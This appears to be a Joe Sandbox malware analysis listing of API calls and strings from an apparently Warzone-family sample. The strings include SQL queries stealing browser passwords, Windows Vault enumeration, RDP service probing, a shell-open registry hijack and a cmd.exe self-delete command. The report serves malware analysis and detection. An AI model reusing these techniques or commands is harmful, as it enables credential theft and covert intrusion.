                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            • StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 0040DBF7
                                                                            • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DC05
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DC22
                                                                            Strings
                                                                            • svchost.exe -k, xrefs: 0040DBFD
                                                                            • ImagePath, xrefs: 0040DBA5
                                                                            • svchost.exe, xrefs: 0040DBEF
                                                                            • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DB5E
                                                                            • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DB6E
                                                                            • ServiceDll, xrefs: 0040DC30
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: OpenQueryValuelstrlen$CloseDispatcherExceptionFreeUserVirtual
                                                                            • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                                                            • API String ID: 2553126176-3333427388
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                                                            • CoInitialize.OLE32(00000000), ref: 00410D4B
                                                                            • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?,?,?,?,?,?,?,?,?,00402E47), ref: 00410D69
                                                                            • VariantInit.OLEAUT32(?), ref: 00410DED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                                            • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                                            • API String ID: 2382742315-1265846757
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                                                            • WriteFile.KERNEL32(?,`@,00426970,00000150,00000000,?,00000000,00000000), ref: 0040EE92
                                                                            • WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                                                            • LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                                                            • LocalFree.KERNEL32(?), ref: 0040EEF6
                                                                            • SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                                                            • ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                                                            • ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
                                                                            • String ID: `@
                                                                            • API String ID: 3276737649-951712118
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                                                            • GetLastError.KERNEL32 ref: 0040926E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00409275
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409282
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004092B1
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004092B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandle$CreateErrorLastReadSize
                                                                            • String ID: Password$Password
                                                                            • API String ID: 1366138817-7788977
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 004146F3
                                                                            • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,"BA), ref: 00414720
                                                                            • CoUninitialize.OLE32 ref: 004148A9
                                                                              • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,74B5B690,00000000,00000000,?,?,00414757), ref: 00414A40
                                                                            • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414771
                                                                              • Part of subcall function 00414492: CoTaskMemFree.OLE32(?,?,00000000,0041483D), ref: 004144A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                                                            • String ID: "BA$Grabber$Source$vids
                                                                            • API String ID: 533512943-1720631296
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004124D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 004124DE
                                                                            • TerminateThread.KERNEL32(00000000,?,?), ref: 00412D19
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00412D84
                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00412E0E
                                                                            • CloseHandle.KERNEL32(?), ref: 00412E1D
                                                                            • CloseHandle.KERNEL32(?), ref: 00412E22
                                                                            • ExitProcess.KERNEL32 ref: 00412E25
                                                                            Strings
                                                                            • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 00412D92
                                                                            • Load, xrefs: 00412D3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                                                            • String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                                                            • API String ID: 3630425516-2018186591
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,77C30770,00000000), ref: 00413ECC
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00413ED3
                                                                            • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00413EF7
                                                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00413F05
                                                                            • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00413F13
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00413F50
                                                                            • Sleep.KERNEL32(000003E8), ref: 00413F5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                                                            • String ID: \System32\cmd.exe
                                                                            • API String ID: 3151064845-2003734499
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • lstrcpyW.KERNEL32 ref: 0040B8B9
                                                                            • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                                                            • RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                                                            • RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                                                            • Path, xrefs: 0040B8F5
                                                                            • thunderbird.exe, xrefs: 0040B8BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                                            • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                                            • API String ID: 3135247354-1374996286
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,004176A4,.tmp,00000000,004176A4,?,00000000), ref: 0040BD0A
                                                                            • PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040B9AA), ref: 0040BD14
                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040BD28
                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040BD34
                                                                              • Part of subcall function 0040C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                                                              • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                                                              • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                                                              • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                                                              • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                              • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,77C30770,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,77C30770,?,00403620,00000000,?,?), ref: 004031A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                                            • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                                                            • API String ID: 881303001-3832748974
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040A98E), ref: 0040ACC6
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadlstrcmp
                                                                            • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                            • API String ID: 2493137890-3967309459
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0040E78B), ref: 0040EFD5
                                                                            • OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0040E78B), ref: 0040EFEA
                                                                            • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0040E78B), ref: 0040F001
                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F00A
                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F011
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                                            • String ID: ServicesActive$TermService
                                                                            • API String ID: 2623946379-1374911754
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(USER32.DLL,?,00411800,?,77C30770,00000000), ref: 00405DF1
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405DFD
                                                                            • ExitProcess.KERNEL32 ref: 00405E21
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressExitLibraryLoadProcProcess
                                                                            • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                                                            • API String ID: 881411216-1361702557
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412310
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412329
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412334
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0041239E
                                                                            • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004123D4
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00417BA4), ref: 00412427
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041248B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041249D
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Process32lstrlen$CreateDispatcherExceptionFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32UserVirtuallstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1221420079-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                                                            • CharLowerW.USER32(00000000,?,00000000), ref: 0041218F
                                                                            • CharLowerW.USER32(?,00000000,?,00000000), ref: 0041219D
                                                                            • lstrcmpW.KERNEL32(00000000,?,00000000), ref: 004121A4
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004121B6
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004121C1
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004121CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
                                                                            • String ID:
                                                                            • API String ID: 1363071124-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 00414CC1
                                                                            • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,?,?,?), ref: 00414CD9
                                                                            • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?,?,?,004175A0,?,?,?), ref: 00414D33
                                                                              • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,74B5B690,00000000,00000000,?,?,00414757), ref: 00414A40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInstance$Initialize
                                                                            • String ID: Grabber$Source$vids
                                                                            • API String ID: 1108742289-4200688928
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00407AB1
                                                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407ABF
                                                                            • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407ACD
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00407B07
                                                                            • Sleep.KERNEL32(000003E8), ref: 00407B16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                                                            • String ID: \System32\cmd.exe
                                                                            • API String ID: 2560724043-2003734499
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                                                            • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                                                            • EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                                                            • LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                                                              • Part of subcall function 00401F6D: CreateThread.KERNEL32 ref: 00401F82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                                                            • String ID: H/@
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(004131BE,00418FE6,?,?,004131BE,00418FE6,?), ref: 00412E34
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,004131BE,00418FE6,?), ref: 00412E51
                                                                            • SetLastError.KERNEL32(00000000,?,?,004131BE,00418FE6,?), ref: 00412E5C
                                                                            • RegSetValueExA.ADVAPI32(?,00418FE6,00000000,00000001,004131BE,00000000,?,?,004131BE,00418FE6,?), ref: 00412E74
                                                                            • RegCloseKey.ADVAPI32(?,?,?,004131BE,00418FE6,?), ref: 00412E7F
                                                                            Strings
                                                                            • Software\Classes\Folder\shell\open\command, xrefs: 00412E47
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorLastOpenValuelstrlen
                                                                            • String ID: Software\Classes\Folder\shell\open\command
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,0040FC57,00000000), ref: 0040F254
                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040F262
                                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 0040F273
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040C341
                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040C357
                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 0040C38A
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0040C3AD
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                              • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                              • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                                                            • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                                            • String ID: `$warzoneTURBO
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00410D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                                                              • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                                                              • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?,?,?,?,?,?,?,?,?,00402E47), ref: 00410D69
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                                                              • Part of subcall function 004134A2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                              • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                              • Part of subcall function 004134A2: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                              • Part of subcall function 004134A2: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                                                              • Part of subcall function 0041119D: GetComputerNameW.KERNEL32 ref: 004111C0
                                                                              • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                                                              • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                              • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
